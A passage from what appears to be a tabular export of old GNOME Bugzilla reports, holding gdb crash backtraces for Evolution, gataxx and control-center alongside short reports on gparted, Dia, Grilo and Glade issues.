    gchar *) 0x10029a98 \020\002\232Ã‚Â¨\020\002xÃƒÂ”\020\002\232Ã‚Â¸
	cur = (GNode *) 0xefc6e40
	to_notify = (GList *) 0x10027d18
#14 0x0f628b4c in gconf_listeners_notify (listeners=0x7f455056
all_above=0x0 
    callback=0x100d4768 user_data=0x0) at gconf-listeners.c:184
No locals.
#15 0x0f63db88 in notify_one_entry (client=0x10040a90
entry=0x100d4768)
    at gconf-client.c:2357
	cae = {client = 0x10040a90 entry = 0x100d4768}
#16 0x0f63dc84 in gconf_client_flush_notifies (client=0x10040a90)
    at gconf-client.c:2397
	entry = (GConfEntry *) 0x100d4768
	tmp = (GSList *) 0x1016f348
	to_notify = (GSList *) 0x1016f348
	last_entry = (GConfEntry *) 0x0
#17 0x0f63d8a4 in notify_idle_callback (data=0x10000000) at
gconf-client.c:2291
No locals.
#18 0x0f0b2fec in g_idle_dispatch (source=0x7f455056
callback=0x10000000 
    user_data=0x7f455056) at gmain.c:3164
No locals.
#19 0x0f0afe9c in g_main_dispatch (context=0x10037688) at gmain.c:1653
	was_in_call = 0
	user_data = 0x10040a90
	callback = 0xf63d888 
	cb_funcs = (GSourceCallbackFuncs *) 0xf0ecbd0
	cb_data = 0x101494e8
	need_destroy = 252391348
	dispatch = (gboolean (*)()) 0xf0b2fb4 
	source = (GSource *) 0x101494b0
	i = 1
#20 0x0f0b1080 in g_main_context_dispatch (context=0x10037688) at
gmain.c:2197
No locals.
#21 0x0f0b144c in g_main_context_iterate (context=0x10037688 block=1 
    dispatch=1 self=0x0) at gmain.c:2278
	max_priority = 200
	timeout = 0
	some_ready = 1
	nfds = 7
	allocated_nfds = 7
	fds = (GPollFD *) 0x10173a58
#22 0x0f0b1d20 in g_main_loop_run (loop=0x1016e668) at gmain.c:2498
	self = (GThread *) 0x10027fb0
#23 0x0faa9b8c in gtk_main () at gtkmain.c:1092
	tmp_list = (GList *) 0x0
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0xfc6de2c
	loop = (GMainLoop *) 0x1016e668
#24 0x10005e90 in main (argc=1 argv=0x7ffffb44) at gataxx.c:929
	client = (GnomeClient *) 0x10029520
	tv = {tv_sec = 1044744611 tv_usec = 345799}
#25 0x0eeaec30 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x0ef3cc98 in wait4 () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-02-08 16:53 -------
Reassigning to the default owner of the component gnome-games-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>sebastien.delestaing</t>
  </si>
  <si>
    <t>GPARTED-351631</t>
  </si>
  <si>
    <t>LiveCd start fails (hw_random)</t>
  </si>
  <si>
    <t>Please describe the problem:
During normal bootstrap system load stops with this message :
hw_random : RNG not detected
udevd_event[2189] : run_program : '/sbin/modprobe' abnormal exit
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:
motherboard MSI 865GVM3-V (MS-7101)
processor Pentium IV
dual VGA (one onboard - the other PowerColor 9250 (R92-LC3) GPU ATI Radeon)
ram 1GB</t>
  </si>
  <si>
    <t>pborsa</t>
  </si>
  <si>
    <t>EVOLUTION-230069</t>
  </si>
  <si>
    <t>crash while forwarding contact</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 1.1.0.99
Synopsis: crash while forwarding contact
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
1. Go to the contacts card view right click on a contact and select
forward contact
2. address the message add some text and hit send
3. see the kaboom
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-mail'
[New Thread 1024 (LWP 13435)]
[New Thread 2049 (LWP 13485)]
[New Thread 1026 (LWP 13486)]
[New Thread 2051 (LWP 13488)]
[New Thread 3076 (LWP 13491)]
[New Thread 4101 (LWP 13492)]
[New Thread 5126 (LWP 13506)]
0x40fc14d9 in wait4 () from /lib/libc.so.6
#0  0x40fc14d9 in wait4 () from /lib/libc.so.6
#1  0x4103930c in __DTOR_END__ () from /lib/libc.so.6
#2  0x40f0d83a in waitpid () from /lib/libpthread.so.0
#3  0x409d29c6 in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x080afb41 in segv_redirect (sig=11) at main.c:71
#5  0x40f0b307 in pthread_sighandler () from /lib/libpthread.so.0
#6  
#7  ccd_ref (ccd=0x0) at mail-callbacks.c:122
#8  0x08085deb in composer_send_cb (composer=0x41b3f798 user_data=0x0)
    at mail-callbacks.c:643
#9  0x40cfc9e7 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
#10 0x40d2c04e in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#11 0x40d2b4af in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#12 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#13 0x4035f991 in bonobo_socket_set_control_frame ()
   from /usr/lib/libbonobox.so.2
#14 0x402ff0f7 in Bonobo_UIComponent_execVerb () from
/usr/lib/libbonobo.so.2
#15 0x40365c76 in bonobo_ui_engine_set_ui_container ()
   from /usr/lib/libbonobox.so.2
#16 0x40365e3d in bonobo_ui_engine_set_ui_container ()
   from /usr/lib/libbonobox.so.2
#17 0x40cfc909 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
#18 0x40d2b4ef in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#19 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#20 0x40367eac in bonobo_ui_engine_emit_verb_on_w ()
   from /usr/lib/libbonobox.so.2
#21 0x4036ef11 in bonobo_ui_sync_status_new () from
/usr/lib/libbonobox.so.2
#22 0x40cfc9e7 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
#23 0x40d2c04e in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#24 0x40d2b4af in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#25 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#26 0x40375724 in bonobo_ui_toolbar_item_activate ()
   from /usr/lib/libbonobox.so.2
#27 0x40370a22 in bonobo_ui_sync_toolbar_new () from
/usr/lib/libbonobox.so.2
#28 0x40cfc9e7 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
#29 0x40d2c04e in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#30 0x40d2b4af in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#31 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#32 0x40c9a4f0 in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#33 0x40c9ba66 in gtk_button_get_relief () from
/usr/lib/libgtk-1.2.so.0
#34 0x40cfc9e7 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
#35 0x40d2b35b in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#36 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#37 0x40c9a434 in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#38 0x40c9b3db in gtk_button_get_relief () from
/usr/lib/libgtk-1.2.so.0
#39 0x40cfc7bd in gtk_marshal_BOOL__POINTER () from
/usr/lib/libgtk-1.2.so.0
#40 0x40d2b4ef in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#41 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#42 0x40d60824 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#43 0x40cfc734 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#44 0x40cfb8f1 in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#45 0x40db00c3 in gdk_wm_protocols_filter () from
/usr/lib/libgdk-1.2.so.0
#46 0x40ef0fa5 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#47 0x40ef15a9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#48 0x40ef1738 in g_main_run () from /usr/lib/libglib-1.2.so.0
#49 0x40cfb1ef in gtk_main () from /usr/lib/libgtk-1.2.so.0
#50 0x4031f53b in bonobo_main () from /usr/lib/libbonobo.so.2
#51 0x080afdb1 in main (argc=3 argv=0xbffffaa4) at main.c:157
#52 0x40f2e1c4 in __libc_start_main () from /lib/libc.so.6
Thread 7 (Thread 5126 (LWP 13506)):
#0  0x40f3f136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40f0aa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40f06ea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401a0e02 in e_msgport_wait (mp=0x417a7170) at e-msgport.c:198
	_buffer = {__routine = 0x401a0d38  
  __arg = 0x417a7170 __canceltype = -1090520332 __prev = 0x0}
	msg = (EMsg *) 0xbefffacc
#4  0x401a156c in thread_dispatch (din=0x417a7118) at e-msgport.c:566
	e = (EThread *) 0x417a7118
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 5126
#5  0x40f07f77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 4101 (LWP 13492)):
#0  0x40f3f136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40f0aa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40f06ea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401a0e02 in e_msgport_wait (mp=0x8136c70) at e-msgport.c:198
	_buffer = {__routine = 0x401a0d38  
  __arg = 0x8136c70 __canceltype = -1088423180 __prev = 0x0}
	msg = (EMsg *) 0xbf1ffacc
#4  0x401a156c in thread_dispatch (din=0x8136c18) at e-msgport.c:566
	e = (EThread *) 0x8136c18
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 4101
#5  0x40f07f77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 3076 (LWP 13491)):
#0  0x40f3f136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40f0aa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40f06ea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401a0e02 in e_msgport_wait (mp=0x8136c70) at e-msgport.c:198
	_buffer = {__routine = 0x401a0d38  
  __arg = 0x8136c70 __canceltype = -1086326028 __prev = 0x0}
	msg = (EMsg *) 0xbf3ffacc
#4  0x401a156c in thread_dispatch (din=0x8136c18) at e-msgport.c:566
	e = (EThread *) 0x8136c18
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 3076
#5  0x40f07f77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 2051 (LWP 13488)):
#0  0x40f3f136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40f0aa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40f06ea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401a0e02 in e_msgport_wait (mp=0x8136bc0) at e-msgport.c:198
	_buffer = {__routine = 0x401a0d38  
  __arg = 0x8136bc0 __canceltype = -1084228876 __prev = 0x0}
	msg = (EMsg *) 0xbf5ffacc
#4  0x401a156c in thread_dispatch (din=0x8136b68) at e-msgport.c:566
	e = (EThread *) 0x8136b68
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 2051
#5  0x40f07f77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1026 (LWP 13486)):
#0  0x40f3f136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40f0aa61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40f06ea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401a0e02 in e_msgport_wait (mp=0x8136b10) at e-msgport.c:198
	_buffer = {__routine = 0x401a0d38  
  __arg = 0x8136b10 __canceltype = -1082131724 __prev = 0x0}
	msg = (EMsg *) 0xbf7ffacc
#4  0x401a156c in thread_dispatch (din=0x8136ab8) at e-msgport.c:566
	e = (EThread *) 0x8136ab8
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 1026
#5  0x40f07f77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 2049 (LWP 13485)):
#0  0x40febb60 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40f07cda in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1024 (LWP 13435)):
#0  0x40fc14d9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x4103930c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40f0d83a in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x409d29c6 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x080afb41 in segv_redirect (sig=11) at main.c:71
	sig = -1073750676
#5  0x40f0b307 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#6  
No symbol table info available.
#7  ccd_ref (ccd=0x0) at mail-callbacks.c:122
	ccd = (struct _composer_callback_data *) 0x80afb20
#8  0x08085deb in composer_send_cb (composer=0x41b3f798 user_data=0x0)
    at mail-callbacks.c:643
	composer = (EMsgComposer *) 0x41b3f798
	message = (CamelMimeMessage *) 0x41788ee8
	info = (CamelMessageInfo *) 0x41ba46f8
	send = (struct _send_data *) 0x41ba56d8
	post = 0
	folder = (CamelFolder *) 0x8133f58
	xev = (XEvolution *) 0x80afb20
	url = 0x41ba56d8 
#9  0x40cfc9e7 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#10 0x40d2c04e in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#11 0x40d2b4af in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#12 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#13 0x4035f991 in bonobo_socket_set_control_frame ()
   from /usr/lib/libbonobox.so.2
No symbol table info available.
#14 0x402ff0f7 in Bonobo_UIComponent_execVerb () from
/usr/lib/libbonobo.so.2
No symbol table info available.
#15 0x40365c76 in bonobo_ui_engine_set_ui_container ()
   from /usr/lib/libbonobox.so.2
No symbol table info available.
#16 0x40365e3d in bonobo_ui_engine_set_ui_container ()
   from /usr/lib/libbonobox.so.2
No symbol table info available.
#17 0x40cfc909 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#18 0x40d2b4ef in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#19 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#20 0x40367eac in bonobo_ui_engine_emit_verb_on_w ()
   from /usr/lib/libbonobox.so.2
No symbol table info available.
#21 0x4036ef11 in bonobo_ui_sync_status_new () from
/usr/lib/libbonobox.so.2
No symbol table info available.
#22 0x40cfc9e7 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#23 0x40d2c04e in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#24 0x40d2b4af in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#25 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#26 0x40375724 in bonobo_ui_toolbar_item_activate ()
   from /usr/lib/libbonobox.so.2
No symbol table info available.
#27 0x40370a22 in bonobo_ui_sync_toolbar_new () from
/usr/lib/libbonobox.so.2
No symbol table info available.
#28 0x40cfc9e7 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#29 0x40d2c04e in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#30 0x40d2b4af in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#31 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#32 0x40c9a4f0 in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#33 0x40c9ba66 in gtk_button_get_relief () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#34 0x40cfc9e7 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#35 0x40d2b35b in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#36 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#37 0x40c9a434 in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#38 0x40c9b3db in gtk_button_get_relief () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#39 0x40cfc7bd in gtk_marshal_BOOL__POINTER () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#40 0x40d2b4ef in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#41 0x40d29524 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#42 0x40d60824 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#43 0x40cfc734 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#44 0x40cfb8f1 in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#45 0x40db00c3 in gdk_wm_protocols_filter () from
/usr/lib/libgdk-1.2.so.0
No symbol table info available.
#46 0x40ef0fa5 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#47 0x40ef15a9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#48 0x40ef1738 in g_main_run () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#49 0x40cfb1ef in gtk_main () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#50 0x4031f53b in bonobo_main () from /usr/lib/libbonobo.so.2
No symbol table info available.
#51 0x080afdb1 in main (argc=3 argv=0xbffffaa4) at main.c:157
	argc = -1073743196
	argv = (char **) 0x80fb557
	orb = 0x80afb20
	sa = {__sigaction_handler = {sa_handler = 0x80afb20  
    sa_sigaction = 0x80afb20 } sa_mask = {__val = {
      0 }} sa_flags = 0 
  sa_restorer = 0x41039f48 }
	osa = {__sigaction_handler = {
    sa_handler = 0x409d2924  
    sa_sigaction = 0x409d2924 } sa_mask = {__val = {0
0 
      1090744224 3221223208 1089563356 0 1090745280 0 1089523154
      1090745264 1090744224 3221223240 1089563356 0 1090745280 0
      1089523154 1090745264 1090744224 3221223272 1089563356 0 
      1090745280 0 1089523154 1090745264 1090744224 3221223304 
      1089201028 3221223440 1073767944 1089208089}} sa_flags =
67108864 
  sa_restorer = 0x40f3eef8 }
#52 0x40f2e1c4 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x40fc14d9 in wait4 () from /lib/libc.so.6
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>EVOLUTION-342359</t>
  </si>
  <si>
    <t>different calendar gets enabled when adding new appointment</t>
  </si>
  <si>
    <t>How to reproduzze:
in the left pane have calendar1 *enabled*. *mark* the disabled calendar2 so it remains disabled.
hit control+n to get a new appointment editor. change the calendar of the appointment from calendar2 (preset) to calendar1.
type in the bla summary and hit OK.
Actual results:
calendar2 gets enabled.
Expected results.
calendar2 does not get enabled why should it?
so i guess we have to fix the automatically enable the calendar $user files the appointment to so $user doesn't get confused why the appointment isn't visible-algorithm.
evo 2.7.1 (cvs checkout from a few days ago)
(any volunteer willing to pass over a better summary please go ahead)</t>
  </si>
  <si>
    <t>DIA-414733</t>
  </si>
  <si>
    <t>Metapost text scaled incorrectly when page scaling is set</t>
  </si>
  <si>
    <t>Please describe the problem:
When the page is scaled (i.e. Page Setup... -&gt; Scale) to something other than 100% the text is as if the page scaling was 100%.
Steps to reproduce:
1. Set page scale (Page Setup... -&gt; Scale) to 30%
2. Export to Metapost
3. View file (run mptopdf then xpdf the result)
Actual results:
Text is large graphics are scaled at 30%
Expected results:
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-20878</t>
  </si>
  <si>
    <t>changing background with embossed</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.1
Synopsis: changing background with embossed
Class:    sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-5.0 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.16
gnome-core: gnome-core 1.2.1
Description:
Changing background...
Debugging information:
0x405cb8e9 in __wait4 () from /lib/libc.so.6
#0  0x405cb8e9 in __wait4 () from /lib/libc.so.6
#1  0x4062a1ec in ?? () from /lib/libc.so.6
#2  0x40153131 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x40558c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x40593fba in __libc_free (mem=0x80beee8) at malloc.c:3023
#5  0x4052e7d8 in free_buffer (
    pixels=0x80beee8 vr\224vr\224xt\226yu\226yu\226yv\226{x\230|y\231{x\230}z\230\177{\233~{\233~{\232\201~\235\203\200\237\202\177\235\200~\233\202\200\236\204\202\237\205\203Â \207\204Â¢\206\204Â¡\206\204Â¡\210\206Â£\212\210Â¤\210\206Â¢\211\210Â¤\216\215Â¨\217\216Âª\215\214Â§\217\215Â¨\220\217Âª\222\221Â¬\220\217Â©\222\221Â«\224\223Â­\224\224Â®\224\224Â­\224\224Â­\226\226Â®\227\226Â°\227\227Â°\227\227Â¯\230\230Â°\232\232Â²\234\234Â³\233\234Â³\233\234Â³\234\235Â³\236\236ÂµÂ Â Â·\237Â Â¶\236\237Âµ\237Â ÂµÂ¢Â£Â¸Â¤Â¥ÂºÂ¢Â¤Â¸Â¡Â£Â·Â¢Â¤Â¸Â¤Â¥Â¹Â§Â¨Â¼Â©Â«Â¿Â§Â©Â¼Â¥Â§ÂºÂ§Â©Â¼ÂªÂ¬Â¾Â«Â®... data=0x0) at gdk-pixbuf.c:130
#6  0x4052e7af in gdk_pixbuf_finalize (pixbuf=0x8097200) at gdk-pixbuf.c:119
#7  0x4052e6e6 in gdk_pixbuf_unref (pixbuf=0x8097200) at gdk-pixbuf.c:75
#8  0x804d022 in fill_monitor ()
#9  0x804da7e in set_monitor_filename ()
#10 0x804db3b in wp_selection_ok ()
#11 0x4029525d in gtk_marshal_NONE__NONE (object=0x8088238 
    func=0x804dab0  func_data=0x80513a8 args=0xbfffedd0)
    at gtkmarshal.c:312
#12 0x402c29ed in gtk_handlers_run (handlers=0x805c818 signal=0xbfffed8c 
    object=0x8088238 params=0xbfffedd0 after=0) at gtksignal.c:1917
#13 0x402c1e32 in gtk_signal_real_emit (object=0x8088238 signal_id=77 
    params=0xbfffedd0) at gtksignal.c:1477
#14 0x402bff35 in gtk_signal_emit (object=0x8088238 signal_id=77)
    at gtksignal.c:552
#15 0x40234888 in gtk_button_clicked (button=0x8088238) at gtkbutton.c:338
#16 0x40235e78 in gtk_real_button_released (button=0x8088238)
    at gtkbutton.c:852
#17 0x4029525d in gtk_marshal_NONE__NONE (object=0x8088238 
    func=0x40235de0  func_data=0x0 args=0xbffff110)
    at gtkmarshal.c:312
#18 0x402c1ceb in gtk_signal_real_emit (object=0x8088238 signal_id=76 
    params=0xbffff110) at gtksignal.c:1440
#19 0x402bff35 in gtk_signal_emit (object=0x8088238 signal_id=76)
    at gtksignal.c:552
#20 0x402347c8 in gtk_button_released (button=0x8088238) at gtkbutton.c:329
#21 0x40235832 in gtk_button_button_release (widget=0x8088238 event=0x808eb40)
    at gtkbutton.c:712
#22 0x40294e29 in gtk_marshal_BOOL__POINTER (object=0x8088238 
    func=0x40235780  func_data=0x0 
    args=0xbffff464) at gtkmarshal.c:28
#23 0x402c1e6b in gtk_signal_real_emit (object=0x8088238 signal_id=27 
    params=0xbffff464) at gtksignal.c:1492
#24 0x402bff35 in gtk_signal_emit (object=0x8088238 signal_id=27)
    at gtksignal.c:552
#25 0x402f534c in gtk_widget_event (widget=0x8088238 event=0x808eb40)
    at gtkwidget.c:2860
#26 0x40294d82 in gtk_propagate_event (widget=0x8088238 event=0x808eb40)
    at gtkmain.c:1313
#27 0x40293fda in gtk_main_do_event (event=0x808eb40) at gtkmain.c:770
#28 0x4033f56b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff7e8 user_data=0x0) at gdkevents.c:2129
#29 0x400921b6 in g_main_dispatch (dispatch_time=0xbffff7e8) at gmain.c:656
#30 0x40092781 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#31 0x40092921 in g_main_run (loop=0x808ead0) at gmain.c:935
#32 0x40293919 in gtk_main () at gtkmain.c:476
#33 0x400214f5 in capplet_corba_gtk_main () from /usr/lib/libcapplet.so.0
#34 0x40020f05 in capplet_gtk_main () from /usr/lib/libcapplet.so.0
#35 0x804f873 in main ()
#36 0x405529cb in __libc_start_main (main=0x804f710  argc=3 
    argv=0xbffff8b4 init=0x804afa4  fini=0x804f8fc  
    rtld_fini=0x4000ae60  stack_end=0xbffff8ac)
    at ../sysdeps/generic/libc-start.c:92
#0  0x405cb8e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4062a1ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40153131 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x40558c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x40593fba in __libc_free (mem=0x80beee8) at malloc.c:3023
mem = (void *) 0xbfffeb10
ar_ptr = (arena *) 0x80beee0
p = 0x80cbc90
#5  0x4052e7d8 in free_buffer (
    pixels=0x80beee8 vr\224vr\224xt\226yu\226yu\226yv\226{x\230|y\231{x\230}z\230\177{\233~{\233~{\232\201~\235\203\200\237\202\177\235\200~\233\202\200\236\204\202\237\205\203Â \207\204Â¢\206\204Â¡\206\204Â¡\210\206Â£\212\210Â¤\210\206Â¢\211\210Â¤\216\215Â¨\217\216Âª\215\214Â§\217\215Â¨\220\217Âª\222\221Â¬\220\217Â©\222\221Â«\224\223Â­\224\224Â®\224\224Â­\224\224Â­\226\226Â®\227\226Â°\227\227Â°\227\227Â¯\230\230Â°\232\232Â²\234\234Â³\233\234Â³\233\234Â³\234\235Â³\236\236ÂµÂ Â Â·\237Â Â¶\236\237Âµ\237Â ÂµÂ¢Â£Â¸Â¤Â¥ÂºÂ¢Â¤Â¸Â¡Â£Â·Â¢Â¤Â¸Â¤Â¥Â¹Â§Â¨Â¼Â©Â«Â¿Â§Â©Â¼Â¥Â§ÂºÂ§Â©Â¼ÂªÂ¬Â¾Â«Â®... data=0x0) at gdk-pixbuf.c:130
No locals.
#6  0x4052e7af in gdk_pixbuf_finalize (pixbuf=0x8097200) at gdk-pixbuf.c:119
119	in gdk-pixbuf.c
pixbuf = (GdkPixbuf *) 0x8097200
#7  0x4052e6e6 in gdk_pixbuf_unref (pixbuf=0x8097200) at gdk-pixbuf.c:75
75	in gdk-pixbuf.c
pixbuf = (GdkPixbuf *) 0x0
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:35 -------
This bug was previously known as bug 20878 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=20878
Originally filed under the control-center product and general component.
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (Larry.Shatzer@sympatric.islanddata.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>Larry.Shatzer</t>
  </si>
  <si>
    <t>GRILO-732016</t>
  </si>
  <si>
    <t>Bad string construction</t>
  </si>
  <si>
    <t>Construction
error = g_error_new (GRL_CORE_ERROR GRL_CORE_ERROR_STORE_FAILED
                     _(Upload failed '%s' transferred %G_GUINT64_FORMAT bytes of %G_GUINT64_FORMAT bytes)
                     upload_status length total)
in src/dleyna/grl-dleyna-source.c is unfriendly for gettext. Message is broken on macro G_GUINT64_FORMAT.</t>
  </si>
  <si>
    <t>GNOME-PYTHON-EXTRAS-302651</t>
  </si>
  <si>
    <t>deprecation warnings in gnomecanvas example</t>
  </si>
  <si>
    <t>A few deprecation warning are raised</t>
  </si>
  <si>
    <t>GLADE-400357</t>
  </si>
  <si>
    <t>Default name for unsaved projects not very descriptive</t>
  </si>
  <si>
    <t>We use the default name Untitled Project for new unsaved projects. I think Project is a very generic term that does not describe '.glade' files well. I think a better name would be Design. This name better describes exactly what a '.glade' file is. In any case Project is better suited to IDEs or Time Management applications.
Furthermore the GNOME HIG recommends using Unsaved instead of Untitled to identify unsaved documents. So the name for unsaved documents might be better as Unsaved Design.
Reference: page 16 GNOME HIG 2.0</t>
  </si>
  <si>
